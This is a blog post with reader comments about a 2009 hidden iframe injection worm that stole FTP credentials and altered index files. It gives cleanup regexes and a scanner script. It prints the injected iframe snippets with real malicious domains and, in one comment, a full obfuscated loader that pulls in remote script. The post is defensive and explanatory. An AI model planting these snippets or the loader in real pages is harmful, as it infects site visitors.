Hidden iframe injection attacks
[Updated on October 27, 2009 with a new version of the script]
It is a shame that after all those posts about security, some of my websites were under attack today.
Shoban and Anand emailed me about this this morning (thanks guys) and I tried to understand what was going on. To my utter disbelief, more than 10 websites hosted on the same server were affected by the attack.
All the index.* files on the server were infected with a piece of code that loaded a hidden iframe in the page.
To the html pages the following piece of code was added:
<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
To php pages it added:
echo "<iframe src=\"http://goooogleadsence.biz/?click=8F9DA\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
Asha took the effort and cleaned most of the infected files. We are monitoring the status now.
How did the worm inject the hidden iframes to my files?
There are two ways through which the worm is believed to infect your files:
1) Server is compromised
This is the most common way. Some of the websites residing on the same web server as your website may be compromised (or it may be some vulnerability in your web application itself) that caused the web server to be compromised. Once the server is compromised, the worm spreads to all the websites on the server.
2) Client side FTP
The worm resides in some/any of the client side PCs you use for accessing the ftp/control panel accounts of your hosting server.
When you type in the username and password for the ftp/control panel account, the worm silently reads the credentials, accesses your ftp account and infects the files in the server. It adds the above mentioned code to all index.* files.
How can I recover from a hidden iframe injection attack?
Here are a few tips that might help you:
- The first thing to do to prevent these kinds of attacks is to change your ftp, control panel and database passwords as soon as possible.
- Notify your web host about the attack and advise them to take measures against a possible server-wide attack.
- Set the file permissions on your server as restrictively as possible.
- Download all your files from the server and check for infections. Clean the infected files.
- Using good antivirus software, scan and clean every PC you use for logging into your hosting server.
- Never use public computers to access your server.
How do I clean infected files?
Use these regular expressions to search for all pages containing the malicious code and replace it with a space (in the patterns below, \" stands for a literal double quote and \\ for a literal backslash):
<iframe src=\"http://[^"]*\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>
echo \"<iframe src=\\\"http://[^"]*\\\" width=1 height=1 style=\\\"visibility:hidden;position:absolute\\\"></iframe>\";
You may have to write a script to automate this for all the files in the server.
I have cooked up a php script that can help you find out the infected files. Download the file from here, save it as clean.php (it is currently clean.php.txt) and upload it to the root folder of your website.
You may want to change some hardcoded values inside the file.
Then visit the url:
http://www.yourdomain.com/clean.php?c=iframe
The parameter c specifies the text to search for inside the file. The results will be something like:
[screenshot of the clean.php results omitted]
It will search all the files in your website and if any of the files contains the given string, it will print the filename along with the number of occurrences of the string. In the above screenshot, you can see that one file is infected.
Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So as of now you will have to clean the files manually.
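As an added example (not the clean.php script from this post, and not code from any commenter), the following Python scanner does the same job offline on a downloaded copy of the site: it walks the tree, applies one regex that covers both the HTML and the PHP-escaped patterns above, and additionally decodes document.write(unescape(...)) payloads of the kind mentioned later in the comments. The domain and file contents are constructed samples, and, like clean.php, it only reports and never modifies files.

```python
import os
import re
import tempfile
import urllib.parse
# One regex derived from the two patterns in the post: the optional backslash
# before each quote lets it match both the plain HTML iframe and the PHP
# echo "...\"...\"..." variant in a single pass.
IFRAME_RE = re.compile(
    r'<iframe src=\\?"http://[^"\\]*\\?" width=1 height=1 '
    r'style=\\?"visibility:hidden;position:absolute\\?"></iframe>',
    re.IGNORECASE,
)
# Obfuscated variant mentioned in the comments: document.write(unescape("%3c%69...")).
UNESCAPE_RE = re.compile(r'unescape\(\s*["\']([^"\']+)["\']\s*\)', re.IGNORECASE)
# Constructed sample site tree; the domain is a placeholder, not a real indicator.
BAD = 'http://malicious.example/?click=8F9DA'
INJECTED_HTML = ('<iframe src="%s" width=1 height=1 '
                 'style="visibility:hidden;position:absolute"></iframe>' % BAD)
INJECTED_PHP = 'echo "%s";' % INJECTED_HTML.replace('"', '\\"')
SAMPLE_FILES = {
    'index.html': '<html><body>hello</body></html>\n' + INJECTED_HTML,
    'index.php': '<?php\n' + INJECTED_PHP + '\n',
    'main.php': '<?php\n' + INJECTED_PHP + '\n' + INJECTED_PHP + '\n',
    'about.html': '<html><body>nothing injected here</body></html>',
    'js/ad.js': 'document.write(unescape("%s"));' % urllib.parse.quote(INJECTED_HTML, safe=''),
    'logo.png': 'binary-ish content the scanner should skip',
}

def scan_text(text):
    """Return (plain_hits, obfuscated_hits) for one file's contents."""
    plain = len(IFRAME_RE.findall(text))
    obfuscated = 0
    for payload in UNESCAPE_RE.findall(text):
        if '<iframe' in urllib.parse.unquote(payload).lower():
            obfuscated += 1
    return plain, obfuscated

def scan_tree(root, extensions=('.html', '.htm', '.php', '.js')):
    """Walk a downloaded site tree and return {relative path: (plain, obfuscated)}
    for every file with at least one hit. Files are only read, never modified."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                hits = scan_text(fh.read())
            if any(hits):
                results[os.path.relpath(path, root).replace(os.sep, '/')] = hits
    return results

def write_samples(root):
    """Materialise SAMPLE_FILES under root so the scanner can run offline."""
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w', encoding='utf-8') as fh:
            fh.write(content)

def scan_samples():
    """Write the constructed tree to a temp dir, scan it and return the report."""
    with tempfile.TemporaryDirectory() as site:
        write_samples(site)
        return scan_tree(site)

if __name__ == '__main__':
    for rel, (plain, obf) in sorted(scan_samples().items()):
        print('%s: %d iframe(s), %d obfuscated' % (rel, plain, obf))
```

To scan a real download, call scan_tree() on the directory you pulled from the server; files with no hits are left out of the report.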
Faiz has written an advanced ASP.Net script for finding the infected files, and it can be found here.
Will my search engine rankings be affected by this attack?
Try to be fast with these steps, because if a visitor sees the message "This site may harm your computer" pop up when (s)he tries to access your website/blog, (s)he may not return again. Remember that if the security of your website is compromised, it can affect the search engine rankings of the website. Besides, it may pave the way for more sophisticated attacks.
Google will mark your site in its search results with a warning: "This site may harm your computer".
Use the following link to see what Google thinks about your website (give the url of your site instead of shopfloorbd.co.uk):
http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk
As mentioned above, you must remove the malware from your local machine using antivirus software. AVG detects it as "Trojan Horse Downloader" and NOD32 as "JS/Kryptik.B trojan".
Note that when visiting an infected site, some antivirus software warns you that an exe file, "Trojan Horse Downloader", is trying to load. Once the exe infects your machine, it will infect your server too.
Here are some more code samples caught from the wild:
<iframe src="http://hostverify.net/?click=2730375" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="http://hosttracker.net/?click=32431937" width=1 height=1 style="visibility:hidden;position:absolute">
There are obfuscated versions of the attack code too:
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){… etc.
Here is a list of some other websites that host malicious content:
If you find these urls in any code on your website, that is a sure sign that you are infected.
Is that the real URL? If so maybe consider adjusting it slightly so no-one accidentally goes to it and gets infected.
Let it be.
Some people are coming to this page from the search term “goooogleadsence.biz”. I hope this article will help them.
Anyway I have not provided any clickable links. So I think there is no harm. If you copy and paste the url to the address bar, you better know what you are doing.
Hey,
This totally happened to me and we are investigating the cause because it is a serious liability issue to us right now. Who is your hosting provider? Is it RackSpace?
Thanks,
Charles
We had this problem happen to us on the mosso rackspace servers…
@Anon @Charles .. Don't tell me that you are having these issues with Rackspace servers?
I thought they are good compared to Cable and Wireless…. We have moved our company sites from C&W to Rackspace.
I don’t think the issue is with any specific hosting provider (unless they screwed up their passwords).
This worm infects the files if it somehow managed to sniff your ftp/cpanel password. The best way to prevent the attack is to change your passwords frequently. Never login to your server ftp/cpanel accounts from public computers (or virus infected computers).
Did you ever get any answers from Mosso? Did they own up to this? We are having the same issue, changed passwords, reuploaded files to see what would happen and bam…string included again.
Nothing running on our site, just hosting files.
“changed passwords, reuploaded files to see what would happen and bam…string included again”
This is a sure shot indication that the machine that you are using to access the server is infected by a spyware/malware.
So this is a new case, eh?
Thanks for the information. It’s really helpful..
I usually use password banks for my logins….
you might want to update the original post with how this worm operates for those coming thru searches.
Having the same problem with a lot of sites under our account with Dreamhost. I told them about the problem and it doesn’t appear they give too much of a damn.
Furthermore, there was a second attack where code pointing to a site hosted on the Dreamhost servers was the recipient of the iframe traffic. Can you believe that they asked me to contact the website owner myself and “discuss” it with him. Yea, coz he must be sooo upset about the extra 5-10K visits per day he’s getting!
Wankers
Spoke too soon – a rep contacted me and it looks like they’re gonna help out as much as they can.
Cool!
Hi,
This virus is not related to the host, but its related to client side malware.
This can be detected through Avast (try free version and it works well). This malware gets the ftp details from the session, connects the site you last connected through ftp, downloads index.* (index.html, index.htm, index.php, index.aspx etc), inserts the iframe code and finally uploads back to the server.
This malware can be detected by Avast and your system will be free from that, but it doesn't cure the files on the server.
To cure files on the server, I have been trying to write a script for the past few days and it seems it's going to work fine; just fine-tuning the script as of now and will be releasing it soon.
The script is written in php file, so if you have php support on your server, this script is going to fix your problems.
Regards,
Dave.
Dave,
Let us know when the script is ready.
Hi,
We've got the same problem. It seems that one of our dev team has that malware on their clients. They will clean it up tomorrow.
I have found this http://www.yourjoomlapro.com/ . Anyone bought that script? Seems to be from Dave, who already posted something here (?).
Regards
Pippo
OK guys same problem bloody ass hole spyware see for yourself
counterstrike.co.nz
Some one please help me
Guys, this is not a host issue; what I believe is it's a client side worm,
I faced same problem with some of my old clients even very new client who just came for this ISSUE only
we found same iframes and today I just found this goooogleadsence code in iframe in one of my client’s website.
I myself cleaned many websites but it just comes in a very short time again..
I cleaned my machine, it's not infected, but I found my office machines are infected with some worms; Avast and NOD32 find this well.
If you have NOD32 or Avast you won't be able to open the website, this anti virus will block the website and warn you about the threat,
Etrust doesn't block the website, it just lets you go and open it, but doesn't download the worm on your machine I guess…
well there is no plenty of solution available yet as there are so many web owners / developers facing the same issue
my recent sites attacked are http://www.waytogrowrich.com and http://www.webtail.de
attack again and again…
Hi,
Have got the fix script ready, check at http://www.yourjoomlapro.com
Some more details here: http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/
[...] suspicious, I google about it. Then I find this post: http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/. I finally know that the script was added somehow to my files by a virus. Yes, it is my own [...]
Hey, I’ve made a wordpress plugin that will block (not remove) the script from being executed.
Check at http://www.nazieb.com/466/blocks-the-annoying-goooogleadsencebiz-iframe/. (beta version)
It’s totally free.
I have had a dozen sites infected, and my experience so far is that:
it targets any file with “index” in the file name. it also targets any file with “main” in the file name. my iframes were pointing to chinese ads.
@Dave,
I bought your script and it worked, thanks! You saved me a bunch of time trying to write the script myself, well worth every penny.
One modification that I made was to include other sources–I had iframes pulling from 3 different sources rather than just goooogleadsence.biz.
Also the hackers target in addition to pages named index, home and default, pages named main, as well as cms specific pages like Drupals maintenance-page.tpl.php and MovableTypes php/extlib/smarty/libs/plugins/modifier.default.php.
Hope that helps somebody.
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ [...]
[...] friend Niyaz was bugging me for a while now, asking me to write an asp.net code for removing malicious code from [...]
I guess all of you are using Total Commander with saved passwords? The virus is stealing your saved passwords, nothing else.
hey guys,
I had the same problem in most of my sites on the server. Until I find who's responsible for injecting those iframes I changed all of the index & home pages' rights to r–r–r– and as far as now everything seems to be ok.
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ [...]
I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.
Now that I’ve cleared it, attacks have stopped. So you all might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.
Cheers
Akash
[...] Hidden iframe injection attacks | Diovo [...]
I got infected too. I found the tool to remove the infection…
i think it is here
http://www.sulumitsretsambew.org/iframe-worms/
Hi,
Another one hosting malicious code is xcount.cc, which has infected my site.
Hello, my site is got infected too by this virus iframe…is there any script that can remove that virus? thanks
Thank you very much. My Web site was infected with this worm and following your indications I have been able to eliminate it. THANKS again.
spiderx that worm removal tool is actually here
http://www.sulumitsretsambew.org/iframe-worms-xtrarobotzcom-superbetfaircn-lotmachinesguidecn/
thank you very much, i finally removed this thing.
Thanks for the info and the script. Your script is quite useful.
I have had the same issue with this worm, it has been driving me nuts. I currently use FTP Commander to access my site and I have not had a problem since. It only attacks the index.php files and adds the iframe code at the end of the script, and corrupts it. I only seemed to have the issue when I used Internet Explorer to access my FTP folders. You will need to immediately change your FTP password, and use another software package to edit your FTP site other than IE. This has gotten me many times within the last week.
Your clean.php file is a big help on finding these issues. thanks.
@Garrett,
Glad it helped!
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ http://blog.tigertech.net/posts/ftp-virus-spreading/ [...]
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ [...]
Hi
I see code injections with encrypted javascript like following.
“document.write(unescape(“%3c%69%66%72%61%6d%65%20%73%72%6
Clean up any such code which is not inserted by you in your site code. Use some decryption sites or application to see actual link.
I want to really thank you for your post here about the issue. It completely took down our site just days before a very important VC meeting. Without the excellent writeup you posted about this issue we would have been sunk. Your writing was clear, the problem was well described and your clean.php file worked great. Kudos!!!!!
Wow cool man .
Thanks that my server admin does a great job . So my site is not effected .
Hi,
very helpful article. Add to the malicious site list this: http://asfirey.net/?click=FA62A
yes big kudos, how frustrating
as if there isn't already enough to do rather than spend days fighting this thing
had nearly 100 sites affected
will check the clean script out and the other one and post back here how it goes
[...] and others providing blogging solutions, in all evenhandedness I’m extending this gesture; kindly [Click to view] the blog. I can be reached if not well [...]
really useful info that u were given in this article
thank you very much…
but im in doubt
im using adsense will your script that u have cooked
[ clean.php.txt ] will affect my earnings through adsense
plzzzz mail to me
plzzzzz i want reply…..
[...] I started searching on the net and found some interesting information on the blog of Niyaz PK. I followed his instructions step by step and hopefully everything is back to normal now. I have [...]
My website was also hit by this trojan some time ago. I checked Google safe browsing and it turned out that the network where my hosting is located has indeed been infected. I have already reported it to the hosting provider. I may be forced to use the regular expressions taught here for the sake of security.
Thanks for the information.
We had to battle an iframe attack a few months ago and it is right that this is not a server issue. The first time it happened we turned the site off to the public and cleaned all of the infected pages, uploaded and we were good for about 8 hours, then it happened again. So this time we ran Avast, which had already been running on the computers since new, and it found nothing, so again we reuploaded all of the cleaned files and bam, again it shows up. Now we were getting pissed, so on advice from another developer we tried Malwarebytes and there they were, multiple malware found on the computer. So we used Malwarebytes to deal with what it found and we went out and got Norton for all computers that access our ftp servers and have not had a problem since. We also did change the passwords for the site each time we were attacked. So in summary do not be cheap with anti virus software; it cost us hours and hours of time and a couple of site down time that could have been prevented by just having adequate antivirus in the first place.
We also found malware using Malwarebytes, which may have been how some of our client websites had been compromised through FTP access, leaving us with a trail of iframe infected index files.
We have since blocked all FTP access and set up the Plesk firewall to only allow safe IP addresses that we have gathered from the known clients that use the FTP.
Two days now and we have had no trouble.
What a nuisance.
Thanks for the informative post, and thanks those who commented with more info.
I’m running on a major US web host, and just suffered this very issue.
I’m in the process of documenting new FTP usage policies for accessing production hosting servers. Are there any other precautions that should be taken, besides those here?
Dear Sir,
I read over your blog and thank you, I found a lot of issues from this hidden iframe. It just started to attack both my music sites and server recently and well I am having hell trying to remove everything since the sites are so big. Can you contact me personally and possibly I can pay you to secure my system?
Matthew Nalett
admin@newmusicpromote.com
PS : Only the admin of this blog who posted this tutorial please email me thank you.
I have tried to run the script in the root directory but avast tells me to abort the connection.
Should I ignore avast and let the page load?
[...] of the attack. You should also change your password for your site immediately. There are various sites on how to recover files and clean up your [...]
I know how to find & clean your infected files on your site.
If you are interested – icq 274314 one one 8
Is there a way by which i can search all the files??????????
not only the specified files with the given file name but all the files!!
can u??? plsssssssss
Dheeraj,
I have modified the script. It now does search in all the files. Beware that it will search in all file including css, js, images, etc. and so if you have very large files, the search will be slow.
thanks a lot!!!! ur script has saved me!! thnq!
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ [...]
[...] than illustrating all steps here, this website was one of the best ones to explain the necessary steps. Make sure you download the PHP script that scans your [...]
Do you have any script for Cold Fusion? tq
thanks for the post, this php iframe injection thing is completely new to me – so any help is good
If you’re on a VPS/dedicated hosting grab yourself a copy of Upload Guardian (http://www.serverprogress.com/upload_guardian.php). It scans for iframe injections and other malicious tools hackers use to modify your pages. The scanning is done on file in real-time via FTP/PHP and will block the attacker at the firewall and can send email alerts.
[...] with a suitable plugin you will discover that malicious code or iframes from unidentified sources have been planted in its pages. Now even the Google results that lead to the blog include a warning: [...]
Hi….
Thanks a billion Diovo.
Malware which effected to my site :
(document.write(”);)
I found your blog while googling about asfirey Malware.
Your code for identifying infected files worked for me.
I am able to locate where exactly Malware effected webpages on my site.
I searched, deleted infected files from my site and I uploaded new files.
Now my site is fine and opening correctly.
Thanks again!
wow… thanks for the information… actually the hidden iframe was for cookie stuffing blackhat… for getting affiliate cookies on people who open the website… when people click on the advertisement then they will get the profit for themselves… not the web owner who displays the ads…
thanks..
it is helpful
I found the following code at last part to my index files:
/*GNU GPL*/ try{window.onload = function(){var Xs1ya4t7ajb13i = document.createElement(’script’);Xs1ya4t7ajb13i.setAttribute(‘type’, ‘text/javascript’);Xs1ya4t7ajb13i.setAttribute(‘id’, ‘myscript1′);Xs1ya4t7ajb13i.setAttribute(’src’, ‘h^#!#t^^^#t)@p(!!:($^/#$^/#)#@o@@($r#))^k#!^u$&)t!#&-))c#^!!o@&)m@)$-####b$$r)#.$t&&a@b&(n^$(a!#k^.$(#!i)r)^$.@(l!$i(@t&&$e^r$^&o#t!&)i)&)c#&a$&&-@#)c$#!o)(^@#m)$&(.#i$#n&(n&&e&w!$)t$&e@r@!(r#@&((a#(.#!&r&#u&$#:(@&8)^!0&8$@)0!/($!g#)$(o&#@o^!g!)l$&^e^@.#!c#)(n(/^$g!(!o!^&o@#&@g)l^#(#e&^@.$^$&c!^)n(/!$(g!o^)&!o@g&(!l$(!!e&@&$.#&c(($o&)m&#)/$(^h^&))a^!o!1&(2^##3#.&&#(c#!&o&m(#/)^&i@@s@@&)t)^^)o((!c$k&(@!p##h#)@o(t)^#o^&.^&!c)#o^!m@$/$@#’.replace(/&|\(|#|\!|\)|\^|\$|@/ig, ”));Xs1ya4t7ajb13i.setAttribute(‘defer’, ‘defer’);document.body.appendChild(Xs1ya4t7ajb13i);}} catch(e) {}
What about you, how do I eliminate it?
Please check my article about this virus:
http://justcoded.com/article/gumblar-family-virus-removal-tool/